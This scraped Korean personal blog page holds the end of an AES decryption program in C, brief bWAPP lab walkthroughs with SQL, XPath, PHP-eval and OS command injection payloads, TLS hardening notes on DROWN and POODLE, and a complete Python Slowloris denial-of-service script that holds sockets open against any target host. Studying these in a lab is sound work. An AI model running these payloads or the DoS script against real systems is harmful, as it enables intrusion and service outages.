		AddRoundKey(round);
		InvMixColumns();
	}
	
	// The last round is given below.
	// The MixColumns function is not here in the last round.
	InvShiftRows();
	InvSubBytes();
	AddRoundKey(0);

	// The decryption process is over.
	// Copy the state array to output array.
	for(i=0;i<4;i++)
	{
		for(j=0;j<4;j++)
		{
			out[i*4+j]=state[j][i];
		}
	}
}
int main()
{
	int i;

	// Recieve the length of key here.
	while(Nr!=128 && Nr!=192 && Nr!=256)
	{
		printf("Enter the length of Key(128, 192 or 256 only): ");
		scanf("%d",&Nr);
	}
	// Calculate Nk and Nr from the recieved value.
	Nk = Nr / 32;
	Nr = Nk + 6;



// Part 1 is for demonstrative purpose. The key and plaintext are given in the program itself.
// 	Part 1: ********************************************************
	
	// The array temp stores the key.
	// The array temp2 stores the plaintext.
	unsigned char temp[32] = {0x00  ,0x01  ,0x02  ,0x03  ,0x04  ,0x05  ,0x06  ,0x07  ,0x08  ,0x09  ,0x0a  ,0x0b  ,0x0c  ,0x0d  ,0x0e  ,0x0f};
	unsigned char temp2[32]= {0x69  ,0xc4  ,0xe0  ,0xd8  ,0x6a  ,0x7b  ,0x04  ,0x30  ,0xd8  ,0xcd  ,0xb7  ,0x80  ,0x70  ,0xb4  ,0xc5  ,0x5a};
	
	// Copy the Key and CipherText
	for(i=0;i<Nk*4;i++)
	{
		Key[i]=temp[i];
		in[i]=temp2[i];
	}

//	       *********************************************************




// Uncomment Part 2 if you need to read Key and CipherText from the keyboard.
// 	Part 2: ********************************************************
/*
	//Clear the input buffer
	flushall();

	//Recieve the Key from the user
	printf("Enter the Key in hexadecimal: ");
	for(i=0;i<Nk*4;i++)
	{
		scanf("%x",&Key[i]);
	}

	printf("Enter the CipherText in hexadecimal: ");
	for(i=0;i<Nb*4;i++)
	{
		scanf("%x",&in[i]);
	}
*/
// 	        ********************************************************


	//The Key-Expansion routine must be called before the decryption routine.
	KeyExpansion();

	// The next function call decrypts the CipherText with the Key using AES algorithm.
	InvCipher();

	// Output the decrypted text.
	printf("nText after decryption:n");
	for(i=0;i<Nb*4;i++)
	{
		printf("%02x ",out[i]);
	}
	printf("nn");

}
lispro06 (비회원)
    • 글자 크기
목록
수정 삭제

댓글 달기

검색 정렬

[bWAPP] bWAPP - Broken Authentication
[원문보기]

A2 - Broken Auth. & Session Mgmt.

bWAPP - Broken Authentication


소스코드의 tonystark/I am Iron Man 을 입력하여 로그인한다.


A2BA-ILF.PNG

[bWAPP] CSRF (Change Password)
[원문보기]

A8 - Cross Site Request Forgery

CSRF (Change Password)


패스워드 변경 경로를 삽입하여 타 계정으로 로그인한 사용자의 비밀번호를 변경한다.


이체 경로를 삽입하여 상대방 계좌의 금액을 차감 한다.


A8CSRF-PSWD.PNG


A8CSRF-AMT.PNG

[bWAPP] XML/XPath Injection (Login Form)
[원문보기]

A1 - Injection

XML/XPath Injection (Login Form)



로그인 ID, PW 에 ' or '1'='1 을 넣으면 된다.


A1-XPATH-LOG.PNG


selene, Thor, johnny, wolverine, alice

wolverine' or 'a'='a--

[bWAPP] Insecure DOR (Change Secret/Reset Secret)
[원문보기]

A4 - Insecure Direct Object References

Insecure DOR (Change Secret)


POST 파라미터로 전송되는 login 값을 수정한다.


XML 에 포함된 login 값을 수정한다.


A4DOR-SEC.PNG

[bWAPP] Insecure DOR (Order Tickets)
[원문보기]

A4 - Insecure Direct Object References

Insecure DOR (Order Tickets)


hidden 필드의 15eur을 변조하여 시도한다.


medium level에서는 post 파라미터에 ticket_price를 추가한다.

[bWAPP] Session Mgmt. - Administrative Portals
[원문보기]

A2 - Broken Auth. & Session Mgmt.

Session Mgmt. - Administrative Portals



admin 파라미터에 1을 넣으면 성공 메시지가 나온다.




[bWAPP] XSS - Reflected (User-Agent)
[원문보기]

A3 - Cross Site Scripting

XSS - Reflected (User-Agent)


header 값 중 user-agent에 스크립트를 삽입하여 전송하는 예제이다.


A3XSS-UA.PNG

[bWAPP] SQL Injection (GET[POST]/Select)
[원문보기]

A1 - Injection

SQL Injection (GET/Select)




A1SQL2.PNG


movie=0+union select schema(),version(),user(),database(),SESSION_USER(),schema(),1--+-&action=go



GET[POST]/SEARCH 는 ' 로 되어 single quote 를 쓸 수가 없다. 동영상에는 그대로 되는데, 환경 탓 인가...


우분투에서는 되는군.

[bWAPP] Server-Side Includes (SSI) Injection
[원문보기]

A1 - Injection

Server-Side Includes (SSI) Injection


LoadModule 을 지원하는 환경에서 가능하다


입력 필드에 <!--#echo var="DOCUMENT_ROOT" --> 를 넣었을 때, 아래와 같이 나오면 LoadModule이 지원 안되는 것이다.

실행 자체가 안 되니 의미가 없다.

<p>Hello 11<!--#echo Var="DOCUMENT_ROOT" --> 11,</p><p>Your IP address is:</p><h1><!--#echo var="REMOTE_ADDR" --></h1>

http://lispro06.woweb.net/infra/51326 참고

* 그동안 cgi 로 혼동했다. T.T;;

[bWAPP] PHP Code Injection
[원문보기]

A1 - Injection

PHP Code Injection


해당 소스는 eval 로 되어 있다.


php 함수를 모두 사용 가능하다.


<p><i><?php @eval ("echo " .$_REQUEST["message"] . ";");?></i></p>



A1PHP.PNG

[bWAPP] OS Command Injection [blind]
[원문보기]

A1 - Injection

OS Command Injection


동영상에서는 ; 등으로 테스트 하는데, windows 서버라 | (pipe, vertical var)로 하면 된다.


A1OSC.PNG


blind 의 경우,


명령어 >> 1.txt


로 파일을 만들어 해당 파일을 접근할 수 있다.


ren 이나, copy 명령어를 사용해 파일을 바꾸거나 txt 확장자로 교체해 소스 확인도 가능할 듯 하다.


del은 쓰지 말자.

[bWAPP] LDAP Injection (Search)
[원문보기]

A1 - Injection

LDAP Injection (Search)


search 구문에 * 을 넣으면 모든 사용자 검색이 가능하므로 해당 문자열을 사용하지 못하도록 한다.


로그인 우회는 확인 중이다.


A1LDAP.PNG

[bAWPP] HTML Injection - Stored (Blog)
[원문보기]

A1 - Injection

HTML Injection - Stored (Blog)


XSS 저장 방식이다.


게시판에 테스트 하듯이 스크립트 구문을 바로 입력하면 된다.


A1XSS-BLG.PNG


html 인젝션은 <h1>bee</h1><h2>bug</h2> 를 넣으면 된다.

[bWAPP] HTML Injection - Reflected (URL)
[원문보기]

A1 - Injection

HTML Injection - Reflected (URL)


현재 url을 표시해주는 간단한 서버사이드 스크립트이다.


~.php?a={스크립트구문}


을 넣어주면 실행 가능하다.


A1XSS-URL.PNG


html 인젝션은 주소창 뒤에 ? 을 넣고 태그를 넣으면 된다.


?<h1>test</h1>

[bWAPP] HTML Injection - Reflected (GET/POST)
[원문보기]

A1 - Injection

HTML Injection - Reflected (GET/POST)


id, pw 필드에 스크립트 코드를 넣으면 레벨 0에서 간단히 테스트할 수 있는데, 요즘 브라우저에서는 교차스크립트 방지 필터가 동작하여 결과 확인이 어렵다.


보안설정을 아래와 같이 바꾸면 가능하다.


A1XSS-GET.PNG


XSS 가 아니고, HTML이라, HTML 태그를 넣어 테스트 해보는 내용이다.


<H1>TEST</H1>

<H2>TEST</H2>

[bWAPP] iFrame injection
[원문보기]

A1 - Injection

iFrame injection


iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250


ParamUrl 에 경로에 존재하는 파일을 넣으면 내용 확인 및 다운로드가 가능하다.


다운로드되는 파일은 portal.zip 이고, 나머지 php 파일 등은 렌더링되어 나오므로 파일 다운로드로 보기는 어렵다.


portal.bak, bugs,txt, 666 은 텍스트 형식이므로 내용 확인이 가능하다.


A1IFR.PNG


이를 소개한 동영상에서는 width, height를 바꾸거나 외부 경로 입력을 테스트 했다.

[DROWN] Decrypting RSA with Obsolete and Weakened eNcryption
[원문보기]

DROWN 취약점이란  “Decrypting RSA with Obsolete and Weakened eNcryption: 취약한 구식 암호화법을 통한 RSA 복호화”에서 따온 이름으로, SSLv2취약점을 악용한 교차 프로토콜 공격입니다.


http://blog.alyac.co.kr/554


POODLE 과 RC4 관련 취약점 들을 제거하더라도 Openssl 관련 취약점이 계속 나오고 있다.


Heartbleed 는 시작이었다.



apache2 현재 Apache/2.2.22 (Ubuntu)  OpenSSL 1.0.1 14 Mar 2012 에서 아래 옵션을 사용해 봤으나 TLSv1.1 이 잘 못 되었다는데, 해결은 추후에 해야겠다.


SSLProtocol -all +TLSv1.1 +TLSv1.2

SSLCipherSuite HIGH:!aNULL:!MD5:!SSLv2:!SSLv3:!TLSv1


RC4는 


SSLProtocol all -SSLv2 -SSLv3

SSLHonorCipherOrder on

SSLCipherSuite "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA EECDH EDH+aRSA !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS"


위와 같이 하면 된 듯 하다.


RC4.png


보안서버가 아래와 같이 무료로 사용할 수 있지만, 설정에 따라 취약할 수 있으니, 이 점에 주의해야 한다.

무료 점검 해주는 사이트들이 많아 좋기는 한데, 설정을 강화해야 하는 번거로움이 있다.


 

 

COMODO

Lets encrypt

Start SSL

금액

도메인 당 5만원 내외

무료

 무료

사용기간

2년/1년

3개월(90일)

1년(365일)

의존성

 

openssl, git, python, gcc, etc…..(자동설치)

 

발급기관

verisign, comodo, …..

Mozilla, …….. sponsored by Google, Facebook, CISCO….

StartCom

지원서버

Apache, nginx, IIS, …..

Apache, nginx, iis(unstable), ?

Apache, IIS, …..

멀티도메인

별도 지원

일반적으로 어려움

유료 지원

[POODLE] SSLv3 Disable 적용 전, 후
[원문보기]

여러 환경에서 취약성을 비교해 볼 수 있는 화면이다.


SSLv3 disable 적용 전, 후를 확실히 확인 가능하다.


https://www.digicert.com/ssl-support/iis-disabling-ssl-v3.htm


IIS의 경우 reg를 제공하므로 쉽게 적용 가능하지만, 재부팅이 필요하다.



ba.png

[Perl] RUDY, Slowloris 공격
[원문보기]

http://advent.perl.kr/2012/2012-12-17.html

 

DoS 공격 중 탐지하기 어려워 방어가 용이하지 않은 slowloris 공격이 있다.

 

해당 공격 패킷을 Perl 로 작성한 예가 있는데, 직접 테스트 해 보았다.

 

$ sudo cpan IO::Socket::INET IO::Socket::SSL Devel::Trace::More

 

참조 경로에는 상기 명령어로 관련 라이브러리를 설치한다.

 

cpan 이나 필요한 것들이 있으면 더 설치한다.(OS 상황마다 다를 것이다.)

 

# ./app.pl -dns [타겟ip] -num [세션수] -timeout [유휴시간]

 

을 입력하면 문자열로 로고 비슷한 글자들이 출력되며 패킷 관련 내용이 출력된다.

 

1.jpg

 

와이어 샤크로 캡처해 보면, 새로운 세션들로(포트 번호가 증가하며) 접속 패킷이 전송된다.

 

2.jpg

 

 

웹서버에서도 netstat 로 여러 포트들이 연결되어 있는 것의 확인이 가능하다.

 

1.jpg

 

 

실제 공격은 불법이므로, 가상머신에서 테스트 해 보았다.

 

서버에서 허용된 세션 수를 초과하면 더 이상 접속되지 않는 것을 확인하였다.

 

 

[python]

import socket, random, time, sys

headers = [

    "User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",

    "Accept-language: en-US,en"

]

 

sockets = []

 

def setupSocket(ip):

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    sock.settimeout(4)

    sock.connect((ip, 80))

    sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 1337)).encode("utf-8"))

 

    for header in headers:

        sock.send("{}\r\n".format(header).encode("utf-8"))

 

    return sock

 

if __name__ == "__main__":

    if len(sys.argv) != 2:

        print("Use it like this: python {} example.com".format(sys.argv[0]))

        sys.exit()

 

    ip = sys.argv[1]

    count = 200

    print("Starting DoS attack on {}. Connecting to {} sockets.".format(ip, count))

 

    for _ in range(count):

        try:

            print("Socket {}".format(_))

            sock = setupSocket(ip)

        except socket.error:

            break

 

        sockets.append(sock)

 

    while True:

        print("Connected to {} sockets. Sending headers...".format(len(sockets)))

 

        for sock in list(sockets):

            try:

                sock.send("X-a: {}\r\n".format(random.randint(1, 4600)).encode("utf-8"))

            except socket.error:

                sockets.remove(sock)

 

        for _ in range(count - len(sockets)):

            print("Re-opening closed sockets...")

            try:

                sock = setupSocket(ip)

                if sock:

                    sockets.append(sock)

            except socket.error:

                break

 

        time.sleep(15)

 

[C#] 파일명 바꾸는 프로그램
[원문보기]

경로명을 참조하여 파일명을 바꾸는 프로그램이다.


        private static string Rename(string filePath, string oldFile, string newFile)

        {

            newFile = filePath + "\" + newFile;

            System.IO.File.Move(oldFile, newFile);

            return "";

        }


rename 함수는 인터넷에서 참조했고, 디렉터리를 리커시브하게 탐색하는 코드는 msdn에서 봤다.

c:에서 확장자를 지정하거나 파일명을 지정해 하위 폴더의 파일명을 바꾼다. 같은 레벨의 파일은 바뀌지 않는다.

한번 바뀐 파일은 no file 이란 출력을 하도록 개선했다.


검색 정렬
이전 1 2 3 4 5 6 7 8 9다음

APLOS BOARD 2 FREE LICENSE
DESIGN BY MACARON
검색
첨부 (1)
WindowsFormsApplication1.zip
28.9KB / Download 45
위로